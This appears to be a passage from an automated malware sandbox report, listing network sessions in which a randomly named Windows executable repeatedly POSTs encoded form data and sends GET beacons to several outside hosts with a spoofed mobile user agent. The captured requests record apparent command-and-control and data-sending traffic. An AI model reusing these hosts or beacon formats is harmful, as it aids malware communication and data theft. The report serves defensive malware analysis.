                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.8497413.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:38.759932041 CEST751OUTPOST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 54 38 55 61 31 38 70 4e 6b 62 71 61 51 7a 7a 37 2f 2f 58 50 31 57 4e 65 32 67 49 63 6f 30 51 78 4d 4f 5a 4f 44 66 66 48 76 37 4f 58 73 4d 35 6a 4a 43 69 54 4d 6d 71 30 32 42 32 4e 36 49 6c 2f 5a 32 41 53 4c 76 50 44 59 74 6b 54 78 77 47 50 2b 2b 49 77 7a 65 36 4b 75 69 51 48 58 52 57 7a 66 33 6c 62 66 32 68 2f 58 70 4a 51 4d 34 46 44 70 78 50 6b 48 69 6e 58 73 4d 44 2b 46 77 31 51 6f 36 65 5a 48 4d 46 33 75 33 6f 4e 56 41 7a 6b 79 37 64 4a 68 52 43 58 63 44 48 32 55 4d 62 7a 61 6b 71 48 74 6e 72 4f 44 65 72 73 75 63 6c 32 6c 48 69 78 46 55 36 6b 4f 33 79 5a 31 68 38 30 6a 71 2b 33 46 44 52 77 70 4c 6e 70 6c 38 4d
                                                              Data Ascii: Ux_TPFo=IYTY2LYjEEx/jT8Ua18pNkbqaQzz7//XP1WNe2gIco0QxMOZODffHv7OXsM5jJCiTMmq02B2N6Il/Z2ASLvPDYtkTxwGP++Iwze6KuiQHXRWzf3lbf2h/XpJQM4FDpxPkHinXsMD+Fw1Qo6eZHMF3u3oNVAzky7dJhRCXcDH2UMbzakqHtnrODersucl2lHixFU6kO3yZ1h80jq+3FDRwpLnpl8M


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.8497423.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:41.307147026 CEST1768OUTPOST /i5ct/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.airtech365.net
                                                              Origin: http://www.airtech365.net
                                                              Referer: http://www.airtech365.net/i5ct/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 49 59 54 59 32 4c 59 6a 45 45 78 2f 6a 54 38 55 61 31 38 70 4e 6b 62 71 61 51 7a 7a 37 2f 2f 58 50 31 57 4e 65 32 67 49 63 6f 4d 51 74 70 53 5a 50 67 33 66 56 2f 37 4f 4c 63 4d 34 6a 4a 43 37 54 4b 50 6a 30 32 63 44 4e 34 67 6c 2b 34 57 41 55 35 48 50 4a 59 74 6b 52 78 77 44 4c 2b 2f 43 77 33 7a 39 4b 74 4b 51 48 58 52 57 7a 64 2f 6c 63 4e 65 68 39 58 70 4f 58 4d 34 7a 48 70 78 72 6b 45 53 5a 58 73 49 31 39 31 51 31 58 4d 61 65 59 31 6b 46 2b 75 33 71 41 31 41 37 6b 79 33 72 4a 68 64 34 58 63 33 39 32 55 6b 62 78 75 4d 77 41 63 53 79 55 67 57 6e 72 75 63 61 35 46 33 6a 7a 57 77 38 72 4f 6e 33 66 77 35 4d 7a 69 65 4b 32 56 4b 32 6e 49 43 32 6d 79 46 69 54 32 7a 67 55 33 55 63 45 48 48 2b 55 63 63 39 56 38 78 59 44 2f 62 58 4c 2b 36 6a 73 44 4f 69 56 45 58 32 41 46 59 50 4e 4c 44 6c 32 37 4f 4f 4d 42 31 6b 6c 73 77 54 79 4c 64 43 4d 35 64 66 79 4e 76 64 54 4d 55 79 62 61 46 66 38 4d 41 49 35 57 71 4d 79 6c 49 55 70 62 79 38 56 4c 45 45 4b 61 5a 4c 64 67 67 79 6c 38 48 75 50 46 [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=IYTY2LYjEEx/jT8Ua18pNkbqaQzz7//XP1WNe2gIcoMQtpSZPg3fV/7OLcM4jJC7TKPj02cDN4gl+4WAU5HPJYtkRxwDL+/Cw3z9KtKQHXRWzd/lcNeh9XpOXM4zHpxrkESZXsI191Q1XMaeY1kF+u3qA1A7ky3rJhd4Xc392UkbxuMwAcSyUgWnruca5F3jzWw8rOn3fw5MzieK2VK2nIC2myFiT2zgU3UcEHH+Ucc9V8xYD/bXL+6jsDOiVEX2AFYPNLDl27OOMB1klswTyLdCM5dfyNvdTMUybaFf8MAI5WqMylIUpby8VLEEKaZLdggyl8HuPFhqRZcSIKRcAhTX8EGUg9a4qi3Sm1h6Spo9PZhySnaoDMtsIDsE/M1Lqcqq8YDKYhE4jV61kVc61/DoZPkhC4Uc47i/SiahQ7MYyH4zaRrSBLpciw4OP2NtBdgvbeB0wrGBJ0wrdPmXPIGvyJjOdjI+d/3ZeeXkAsaVSXpqkv2eDMJKAqEcOp1myCDNOvyMx9ffHY5JjYOyFe0WIzFYBrC2ZxRyHrwlHVMAsd3uauioMUS3fpi1Ml9lfwVlf2ipiB7yTRSHAj9hGQbjBZK1Ra2j0eGtbz8YB508vCSNz42tl4xwo8AIiqY5WagLKlduuYhRSUoK/83Ok6gXyFLwl/MgqmH/W95ec11mkzW+eus6zmJxdmttnoiPglBKNiL+oyfq81DQF9gTQv3I9cxl3TcEyOgxShXICOcVuB1njBb4jJnbPC1cgQvw28WuVOUk8uJgPRKL+1Tjq2wKiDPXR0T+pub6roRAb9nu3nDiRKyhciKIVJSQWQrYOdDOFnHc67nqN7Jxfcd0InDepuEKUTNdjmyqOliyCUrp4Mk+p1jzEYL45IJ55BuoEhzLGRY8jBKllDgrbiwX1yaJp3X/pY5NvhS1spBTxNpbCu6OGl9piIhH86Ws18n5JBWG6+nyX1yyl69Y0X7zPEDuA/Krs5UyIK5JPUOnt2ZH [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.8497433.33.130.190806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:43.850404978 CEST474OUTGET /i5ct/?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.airtech365.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:17:44.300858974 CEST414INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:17:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 76 79 70 42 3d 38 38 6b 54 44 58 62 38 6b 34 64 48 26 55 78 5f 54 50 46 6f 3d 46 61 37 34 31 39 38 37 41 57 49 34 6d 6c 38 4a 62 79 6b 67 4a 68 4c 6c 64 52 53 56 38 4d 4c 4d 43 6c 71 36 59 58 30 62 43 72 6b 55 2b 4a 61 6f 50 7a 71 6a 44 75 66 36 49 63 6c 65 39 61 61 75 54 37 4c 77 36 6e 64 6c 62 49 45 7a 39 72 47 74 58 34 32 71 49 5a 78 39 57 78 59 50 48 73 79 2b 37 54 79 4f 5a 76 37 6a 4f 45 6c 4c 74 75 65 58 64 74 66 72 6a 45 4a 52 64 59 38 53 63 74 4d 46 2f 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=Fa741987AWI4ml8JbykgJhLldRSV8MLMClq6YX0bCrkU+JaoPzqjDuf6Icle9aauT7Lw6ndlbIEz9rGtX42qIZx9WxYPHsy+7TyOZv7jOElLtueXdtfrjEJRdY8SctMF/g=="}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.84974452.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:17:57.664803982 CEST749OUTPOST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 43 75 7a 56 6a 58 6c 32 61 31 61 70 62 51 42 45 37 64 56 2f 56 54 42 33 69 59 58 48 4c 53 70 30 54 2b 68 77 52 4a 4f 2f 35 35 4c 74 58 6c 51 62 6c 2f 6b 4e 6d 47 74 4c 39 49 31 79 6f 41 31 46 62 42 2b 2f 30 31 4b 39 32 33 30 2b 64 4c 35 75 6b 37 54 6a 6d 6f 51 47 45 53 39 73 35 79 7a 4a 6e 6f 62 36 55 61 64 6d 70 32 64 6a 32 53 75 59 38 35 59 45 59 36 73 47 30 68 69 57 4d 52 58 6d 44 41 53 4d 73 57 43 72 6c 6d 35 34 6a 52 76 71 4a 46 38 54 4c 32 39 74 32 56 6e 6c 76 43 76 78 35 6f 36 46 5a 55 75 57 4d 33 6c 42 30 74 43 72 48 72 37 31 49 30 51 67 79 38 55 3d
                                                              Data Ascii: Ux_TPFo=YxM2bnsTaCCVCuzVjXl2a1apbQBE7dV/VTB3iYXHLSp0T+hwRJO/55LtXlQbl/kNmGtL9I1yoA1FbB+/01K9230+dL5uk7TjmoQGES9s5yzJnob6Uadmp2dj2SuY85YEY6sG0hiWMRXmDASMsWCrlm54jRvqJF8TL29t2VnlvCvx5o6FZUuWM3lB0tCrHr71I0Qgy8U=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.84974552.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:00.214818001 CEST769OUTPOST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 51 66 44 56 68 30 4e 32 66 56 61 71 65 51 42 45 78 39 55 30 56 54 4e 33 69 5a 53 61 4c 6b 42 30 54 66 52 77 65 6f 4f 2f 2b 35 4c 74 63 46 51 65 6f 66 6b 45 6d 47 6f 32 39 4a 5a 79 6f 41 78 46 62 46 79 2f 30 47 69 2b 30 6e 30 38 57 72 35 6f 35 4c 54 6a 6d 6f 51 47 45 53 70 43 35 79 62 4a 6e 5a 72 36 47 37 64 70 6a 57 64 69 78 53 75 59 34 35 59 49 59 36 73 65 30 67 4f 6f 4d 58 54 6d 44 43 61 4d 6f 54 2b 73 72 6d 35 69 6e 52 75 65 4a 51 68 74 52 52 74 44 79 57 44 64 75 6a 62 49 31 2b 58 76 44 32 6d 51 50 33 4e 71 30 75 71 64 43 63 6d 64 53 58 41 51 73 72 42 44 2f 31 31 74 46 6f 6b 6f 6c 6e 38 51 4d 4c 4e 75 4d 53 53 35
                                                              Data Ascii: Ux_TPFo=YxM2bnsTaCCVQfDVh0N2fVaqeQBEx9U0VTN3iZSaLkB0TfRweoO/+5LtcFQeofkEmGo29JZyoAxFbFy/0Gi+0n08Wr5o5LTjmoQGESpC5ybJnZr6G7dpjWdixSuY45YIY6se0gOoMXTmDCaMoT+srm5inRueJQhtRRtDyWDdujbI1+XvD2mQP3Nq0uqdCcmdSXAQsrBD/11tFokoln8QMLNuMSS5


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.84974652.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:02.915519953 CEST1786OUTPOST /8q1d/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.longfilsalphonse.net
                                                              Origin: http://www.longfilsalphonse.net
                                                              Referer: http://www.longfilsalphonse.net/8q1d/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 59 78 4d 32 62 6e 73 54 61 43 43 56 51 66 44 56 68 30 4e 32 66 56 61 71 65 51 42 45 78 39 55 30 56 54 4e 33 69 5a 53 61 4c 6b 4a 30 54 74 70 77 52 76 53 2f 2f 35 4c 74 66 46 51 66 6f 66 6c 47 6d 47 51 79 39 4a 46 69 6f 43 35 46 62 67 75 2f 39 58 69 2b 2b 6e 30 38 5a 4c 35 74 6b 37 54 32 6d 75 77 43 45 53 35 43 35 79 62 4a 6e 61 44 36 51 61 64 70 77 47 64 6a 32 53 75 55 38 35 5a 56 59 36 30 6b 30 67 36 34 4d 6b 62 6d 44 68 79 4d 75 31 71 73 6a 6d 35 6b 71 78 75 47 4a 51 6c 49 52 56 4e 31 79 58 6e 37 75 6b 76 49 77 49 32 32 5a 6e 69 4b 55 56 56 48 74 38 69 63 44 4f 61 4e 59 55 68 68 73 34 6c 56 70 43 41 47 41 6f 6f 2b 69 6e 68 50 4f 73 42 64 42 6d 7a 6b 54 4f 2f 51 49 35 66 57 78 63 6b 68 69 67 59 39 52 68 76 4a 78 50 63 66 78 52 33 66 71 4e 51 57 4a 37 6b 6a 2b 71 31 37 74 37 66 73 71 56 4d 76 6b 35 56 41 55 64 58 34 51 51 42 50 54 41 42 55 44 7a 62 6f 67 30 75 38 2b 2f 54 6f 6e 45 57 33 47 79 70 71 32 7a 61 38 73 66 30 6d 2b 49 56 2b 56 59 71 34 64 4b 6d 39 4e 4f 70 44 61 6c [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=YxM2bnsTaCCVQfDVh0N2fVaqeQBEx9U0VTN3iZSaLkJ0TtpwRvS//5LtfFQfoflGmGQy9JFioC5Fbgu/9Xi++n08ZL5tk7T2muwCES5C5ybJnaD6QadpwGdj2SuU85ZVY60k0g64MkbmDhyMu1qsjm5kqxuGJQlIRVN1yXn7ukvIwI22ZniKUVVHt8icDOaNYUhhs4lVpCAGAoo+inhPOsBdBmzkTO/QI5fWxckhigY9RhvJxPcfxR3fqNQWJ7kj+q17t7fsqVMvk5VAUdX4QQBPTABUDzbog0u8+/TonEW3Gypq2za8sf0m+IV+VYq4dKm9NOpDalI7t0ViA7IHBQ2q9hrP14zps65SSCbUxaS/L66Uw8mV0D2DfbSzIJPBc9y0gAnFf0FcbdcG+Pg2bjEogwxhKtD1733R0Tvf/0sWPfkLyAq9D7ZFpuzb4WGiuYNYWjCPIGw3luNn4S9tjQkMtY1Xe/787a0pAUdmC0nBDuxoTcrkrPWD9tZYt2C9U2zkFarnoVMwShLTdvHRL7Gk/RmnnCfonVV0JVtVUFlYYueB6Q9ohGz2RnvvQsO9ujOGB2a6k/XS8WiPgQY3stzhbRMIom9lQoq6daCC7gYuomP/CxFGApH1xeA8alAa6E1TUWjRQ4bRiVcQWTnFz+EBNRRj4ZpiXph3P9/G+ld7mK2dUUIbgN7H1i501LtPByqBNKSBgoEeKAN173biwzb1Eb49smiIiu2x5l33YT2xK0nLwneowrqBto33ED3op4L9HFQ91VY6PMt0pEBVVyxCiL2xFb+PywEamx+wKX2+LhNQ3F8nq/1chhU+lc5Kl8zR+IMcTqwwEaA1bZA0G3MxX85u+ZZde10TkkiVKfX9WQ8ewontYN9zgG1x4GxMxUIyrqKIM7PZuQbopNeY/wOEtHvanybYsu7Ieb0aYOmvM0chdVbBVDiWZBd2uwBdyEco/oISMMY0Lu/qeaFc1nUF2fWoBHh3Ri/BEaHj7I6W [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.84974752.223.13.41806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:05.460616112 CEST480OUTGET /8q1d/?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.longfilsalphonse.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:18:05.939368010 CEST414INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:18:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 76 79 70 42 3d 38 38 6b 54 44 58 62 38 6b 34 64 48 26 55 78 5f 54 50 46 6f 3d 56 7a 6b 57 59 51 49 71 5a 43 71 79 54 61 36 43 6d 43 46 58 61 33 71 6f 59 77 55 44 34 73 31 66 66 53 70 70 67 4a 72 74 56 43 46 30 53 4e 70 51 59 72 48 41 2b 76 62 39 56 30 68 73 72 65 70 74 76 52 30 61 72 71 35 48 6d 77 52 69 5a 44 75 4c 32 45 62 66 78 6e 73 62 51 37 64 44 39 61 44 6c 71 34 6f 51 64 54 64 4d 32 51 6a 32 67 36 61 30 62 70 45 57 77 57 49 42 37 78 36 4a 6c 64 51 4e 4d 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=VzkWYQIqZCqyTa6CmCFXa3qoYwUD4s1ffSppgJrtVCF0SNpQYrHA+vb9V0hsreptvR0arq5HmwRiZDuL2EbfxnsbQ7dD9aDlq4oQdTdM2Qj2g6a0bpEWwWIB7x6JldQNMQ=="}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.84974838.47.232.144806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:11.424036026 CEST716OUTPOST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 6b 30 6b 75 31 6e 70 6c 6b 76 75 4b 72 4e 52 4a 73 33 38 64 36 69 67 5a 6e 76 2b 58 65 56 4b 4f 32 4a 70 71 2f 57 4f 71 4b 4a 74 63 6e 4c 6c 32 43 43 78 6f 66 6f 71 45 48 37 2b 79 75 50 45 48 5a 4f 71 30 43 62 57 67 4a 70 44 56 33 4d 4d 51 4c 53 63 6c 73 42 4b 31 35 57 43 32 6c 55 38 72 77 62 37 39 42 51 6e 43 4a 64 42 54 5a 4a 58 5a 72 65 43 65 4e 4b 72 50 46 66 68 42 66 42 41 79 70 6f 4c 65 68 72 31 4d 5a 61 76 78 76 36 2b 46 76 70 72 61 73 68 4c 6a 67 68 69 6c 34 59 59 67 45 63 65 47 31 69 6d 6a 54 45 71 45 4a 34 6a 41 56 30 57 2f 2f 54 69 6c 6c 51 55 3d
                                                              Data Ascii: Ux_TPFo=QBSjsgWvRN45k0ku1nplkvuKrNRJs38d6igZnv+XeVKO2Jpq/WOqKJtcnLl2CCxofoqEH7+yuPEHZOq0CbWgJpDV3MMQLSclsBK15WC2lU8rwb79BQnCJdBTZJXZreCeNKrPFfhBfBAypoLehr1MZavxv6+FvprashLjghil4YYgEceG1imjTEqEJ4jAV0W//TillQU=
                                                              Sep 25, 2024 09:18:12.305397034 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.84974938.47.232.144806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:18:13.962995052 CEST736OUTPOST /wqu9/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.yu35n.top
                                                              Origin: http://www.yu35n.top
                                                              Referer: http://www.yu35n.top/wqu9/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 51 42 53 6a 73 67 57 76 52 4e 34 35 31 6b 30 75 36 67 46 6c 7a 66 75 4a 6e 74 52 4a 6e 58 38 5a 36 69 73 5a 6e 71 47 35 65 67 53 4f 31 72 78 71 38 58 4f 71 4a 4a 74 63 76 72 6c 33 4e 69 78 5a 66 6f 6d 32 48 37 43 79 75 4f 67 48 5a 4d 69 30 43 4d 4b 6e 50 35 44 58 38 73 4d 57 50 53 63 6c 73 42 4b 31 35 57 48 6a 6c 51 59 72 78 72 72 39 41 31 4c 42 44 39 42 51 4a 35 58 5a 6d 2b 43 61 4e 4b 71 61 46 65 4e 6e 66 44 34 79 70 73 44 65 68 2b 42 4e 53 61 76 4e 6a 71 2f 73 6e 4a 61 79 75 58 6d 4e 69 77 32 2b 34 4b 64 45 46 71 7a 73 76 41 75 6c 51 45 43 76 4a 37 4c 32 51 44 4c 58 6c 77 79 56 37 48 41 46 58 6a 33 4b 51 66 49 59 47 47 75 4f 47 41 79 53 70 33 50 56
                                                              Data Ascii: Ux_TPFo=QBSjsgWvRN451k0u6gFlzfuJntRJnX8Z6isZnqG5egSO1rxq8XOqJJtcvrl3NixZfom2H7CyuOgHZMi0CMKnP5DX8sMWPSclsBK15WHjlQYrxrr9A1LBD9BQJ5XZm+CaNKqaFeNnfD4ypsDeh+BNSavNjq/snJayuXmNiw2+4KdEFqzsvAulQECvJ7L2QDLXlwyV7HAFXj3KQfIYGGuOGAySp3PV
                                                              Sep 25, 2024 09:18:14.847249031 CEST312INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Wed, 25 Sep 2024 07:18:14 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 148
                                                              Connection: close
                                                              ETag: "66ea4ae9-94"
